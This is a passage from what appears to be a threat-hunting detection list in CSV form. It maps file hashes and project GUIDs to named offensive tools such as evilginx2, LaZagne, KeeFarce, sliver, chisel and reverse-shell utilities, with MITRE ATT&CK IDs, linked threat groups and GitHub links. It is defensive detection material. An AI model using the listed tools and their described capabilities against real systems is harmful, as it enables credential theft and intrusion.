fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25592" "*43BB3C30-39D7-4B6B-972E-1E2B94D4D53A*",".{0,1000}43BB3C30\-39D7\-4B6B\-972E\-1E2B94D4D53A.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","#GUIDproject","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","25594" "*43bc3fe471a81b11c2e59cd0fd55630cee7860f8caad44fb8ee54d109e01a5e5*",".{0,1000}43bc3fe471a81b11c2e59cd0fd55630cee7860f8caad44fb8ee54d109e01a5e5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","25595" "*43c1a32158fa01f876c670e53c90f43ebdf4cf61f7b8cc683f06c0c76250bb1a*",".{0,1000}43c1a32158fa01f876c670e53c90f43ebdf4cf61f7b8cc683f06c0c76250bb1a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25596" "*43c40eb82cecff19379a8de93b36686149eded614d1dfbdabd31e3fb9e6f3fc6*",".{0,1000}43c40eb82cecff19379a8de93b36686149eded614d1dfbdabd31e3fb9e6f3fc6.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","25597" "*43cead8f26b98fad21e2e16e0d98da92e49606b347616c1a5eec5c0bcc492056*",".{0,1000}43cead8f26b98fad21e2e16e0d98da92e49606b347616c1a5eec5c0bcc492056.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","25600" "*43d446b0423388d156a4d8c61a65ab5e1492b045fbfcd528689d525af758678d*",".{0,1000}43d446b0423388d156a4d8c61a65ab5e1492b045fbfcd528689d525af758678d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25603" "*43d7e47e21d334bb7130c5709c16f02e2cf7e4a808382aed3c0ba12cc84b9ea9*",".{0,1000}43d7e47e21d334bb7130c5709c16f02e2cf7e4a808382aed3c0ba12cc84b9ea9.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#filehash","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","25604" "*43da5889dce96d8f11dd09ab509217c13aad4a9cc51538633428aa9887b1039d*",".{0,1000}43da5889dce96d8f11dd09ab509217c13aad4a9cc51538633428aa9887b1039d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","25605" "*43df5040293c26759058a425487affe0f84cdbe1cee85567788f7099782d77df*",".{0,1000}43df5040293c26759058a425487affe0f84cdbe1cee85567788f7099782d77df.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25606" "*43ebdb62e179113a55ccd4297316532582be71857b85d85ba187cd6146757397*",".{0,1000}43ebdb62e179113a55ccd4297316532582be71857b85d85ba187cd6146757397.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25609" "*43f5ef8c625efba630bb99fd4ae086008ebed5c2f3386f1b43bbe8ee7c06f591*",".{0,1000}43f5ef8c625efba630bb99fd4ae086008ebed5c2f3386f1b43bbe8ee7c06f591.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","#filehash","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","25611" "*43f6bfcdb8751cd4232241d4baf2c46333c7a71885fd9571242e16c4b4a81691*",".{0,1000}43f6bfcdb8751cd4232241d4baf2c46333c7a71885fd9571242e16c4b4a81691.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25612" 
"*43fab469f6f43d0434dd4cfb16d6719c353618d818ebd2ead0f8a0f23f84e4c3*",".{0,1000}43fab469f6f43d0434dd4cfb16d6719c353618d818ebd2ead0f8a0f23f84e4c3.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","25613" "*440fb40172430f771a7c289ebb8257988624fdd0a95f84d0b24432a18144b4be*",".{0,1000}440fb40172430f771a7c289ebb8257988624fdd0a95f84d0b24432a18144b4be.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25616" "*441ad151017dbc879fa10de0f4b090d296ec028cbdd5587bb72a62e521c21157*",".{0,1000}441ad151017dbc879fa10de0f4b090d296ec028cbdd5587bb72a62e521c21157.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25618" "*441c29048f8aee256eee59a66098ff2223b1f225386aa9d91b8d391ea0f59cb2*",".{0,1000}441c29048f8aee256eee59a66098ff2223b1f225386aa9d91b8d391ea0f59cb2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25619" "*441cb40ecc946bfb7d9ec0e7880f17f07b899adb176c6f40231aec2ab41ac1d7*",".{0,1000}441cb40ecc946bfb7d9ec0e7880f17f07b899adb176c6f40231aec2ab41ac1d7.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","#filehash","N/A","10","","N/A","","","","25620" "*4420ccad05518f31e8960f7af1dd0d50e34331ff19fc618511cf91ac557e2f3f*",".{0,1000}4420ccad05518f31e8960f7af1dd0d50e34331ff19fc618511cf91ac557e2f3f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","25621" "*4427e67765107bd7436624619a93336d4ddf0bc22a0ae1a2c8dca47a04d4d2c3*",".{0,1000}4427e67765107bd7436624619a93336d4ddf0bc22a0ae1a2c8dca47a04d4d2c3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25622" "*44321a4dc67e158e93fd037ef197dddfc4e454cacfd87f13964032edcb4b3478*",".{0,1000}44321a4dc67e158e93fd037ef197dddfc4e454cacfd87f13964032edcb4b3478.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25625" "*4435f3c1a52fe762834684da28c45e9b5217b9c0cb65882f95cc45516c8afd9b*",".{0,1000}4435f3c1a52fe762834684da28c45e9b5217b9c0cb65882f95cc45516c8afd9b.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense 
Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","25626" "*44370c394c70f88cd9ecfb23f9d6570e2134761d1a04deea5205cec31469cfb0*",".{0,1000}44370c394c70f88cd9ecfb23f9d6570e2134761d1a04deea5205cec31469cfb0.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","25627" "*44397fe87b7547b84e1fe0168d4cdd8128f069c5ee863accb2c4867acfcacc1a*",".{0,1000}44397fe87b7547b84e1fe0168d4cdd8128f069c5ee863accb2c4867acfcacc1a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25628" "*443b045acebb863062cf5b292afd9d831700510daec69f1961aa7236d1d595aa*",".{0,1000}443b045acebb863062cf5b292afd9d831700510daec69f1961aa7236d1d595aa.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","25629" "*443D8CBF-899C-4C22-B4F6-B7AC202D4E37*",".{0,1000}443D8CBF\-899C\-4C22\-B4F6\-B7AC202D4E37.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - 
T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#GUIDproject","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","25630" "*444bb9e867be655f6c5c89b8f6f1d991417f13eeb2e1838bb42c0ac9ee5f00f7*",".{0,1000}444bb9e867be655f6c5c89b8f6f1d991417f13eeb2e1838bb42c0ac9ee5f00f7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25632" "*4459ea3ad77b52ee723e8e8db6cf46ac565fefef5126717f7fc64d596cd4eb67*",".{0,1000}4459ea3ad77b52ee723e8e8db6cf46ac565fefef5126717f7fc64d596cd4eb67.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","25634" "*4465f8d00184474f6f609f3e2f9ad68b70bfcddbc2e8f370f8d4fa6e47a9e0ee*",".{0,1000}4465f8d00184474f6f609f3e2f9ad68b70bfcddbc2e8f370f8d4fa6e47a9e0ee.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","25635" 
"*446a1979c24a8cb2efdd285f14545b1354cd7c06e9d4e69e10a5053158dee119*",".{0,1000}446a1979c24a8cb2efdd285f14545b1354cd7c06e9d4e69e10a5053158dee119.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25637" "*446bfa3d1953383cc10abbd6e49cc3c27eeb76abca0839c970b539f69ad26c1a*",".{0,1000}446bfa3d1953383cc10abbd6e49cc3c27eeb76abca0839c970b539f69ad26c1a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25638" "*446c06c2d90d1afb23e58a0185087888a5225a6d16aa3949648a80c47e2430ce*",".{0,1000}446c06c2d90d1afb23e58a0185087888a5225a6d16aa3949648a80c47e2430ce.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","25639" 
"*446dded3a070a586ff2c25e9a17784ed650e594e9a08b703c4cbd2662b95c94c*",".{0,1000}446dded3a070a586ff2c25e9a17784ed650e594e9a08b703c4cbd2662b95c94c.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","#filehash","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","25640" "*447286de6b80a554a59b971a84aed07594bb2bfb66e0760363a6b36b930c35ce*",".{0,1000}447286de6b80a554a59b971a84aed07594bb2bfb66e0760363a6b36b930c35ce.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25641" "*4477af81ed3e1c76c637314311b3923f8155896ea2e18d5ab2fa6508f46d3b4a*",".{0,1000}4477af81ed3e1c76c637314311b3923f8155896ea2e18d5ab2fa6508f46d3b4a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25642" "*4477d20c4924cc63a0ed4a37c18dbf9e19b96f88b606d03969d4f0adca36e847*",".{0,1000}4477d20c4924cc63a0ed4a37c18dbf9e19b96f88b606d03969d4f0adca36e847.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25643" "*44782077d86a1fd173b94e020c23dc511a58fe77e055116014c30f8ecc4ead91*",".{0,1000}44782077d86a1fd173b94e020c23dc511a58fe77e055116014c30f8ecc4ead91.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","#filehash","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","25644" "*447b74994f6fec7bf3118b9c2056feca43667b899889c2a4f561303a18c82ce9*",".{0,1000}447b74994f6fec7bf3118b9c2056feca43667b899889c2a4f561303a18c82ce9.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and 
SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","#filehash","N/A","10","","N/A","","","","25646" "*447ea37d555fb32ea2957369ea1aeee31898a4e1f1783eb834dc9df2f469252e*",".{0,1000}447ea37d555fb32ea2957369ea1aeee31898a4e1f1783eb834dc9df2f469252e.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","25648" "*4486f1bdaf83de269c93c88c139550a8c089eb82b66664ea4857ae00a5493253*",".{0,1000}4486f1bdaf83de269c93c88c139550a8c089eb82b66664ea4857ae00a5493253.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25650" "*448a280cf39fcebb006e9a66c81b9d59e884f0ed16590ac19d976e44fab7907d*",".{0,1000}448a280cf39fcebb006e9a66c81b9d59e884f0ed16590ac19d976e44fab7907d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25651" 
"*4494BDD20D3FA171BF25A733B6755A6BE88F97BAEBB98820A385CE2D4BE9BE0F*",".{0,1000}4494BDD20D3FA171BF25A733B6755A6BE88F97BAEBB98820A385CE2D4BE9BE0F.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#filehash","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","25653" "*4499aeab182ba401920e4177d8f78628d789659bdc5fb185d28eeefb2cac6527*",".{0,1000}4499aeab182ba401920e4177d8f78628d789659bdc5fb185d28eeefb2cac6527.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25655" "*449a2fbf36afadf80c8655c09acc1418d286106f9ffe9422c0879861c7a70e58*",".{0,1000}449a2fbf36afadf80c8655c09acc1418d286106f9ffe9422c0879861c7a70e58.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25656" "*449CE476-7B27-47F5-B09C-570788A2F261*",".{0,1000}449CE476\-7B27\-47F5\-B09C\-570788A2F261.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","25657" 
"*44a594fa7c72fcfc96a0a045060135a7571a215ede7bdde790cf992ec56595fd*",".{0,1000}44a594fa7c72fcfc96a0a045060135a7571a215ede7bdde790cf992ec56595fd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25659" "*44acd66093e5cc54cdd68c183815d7c16b48b82aadd03c03bb01f3e03adf17c1*",".{0,1000}44acd66093e5cc54cdd68c183815d7c16b48b82aadd03c03bb01f3e03adf17c1.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","25661" 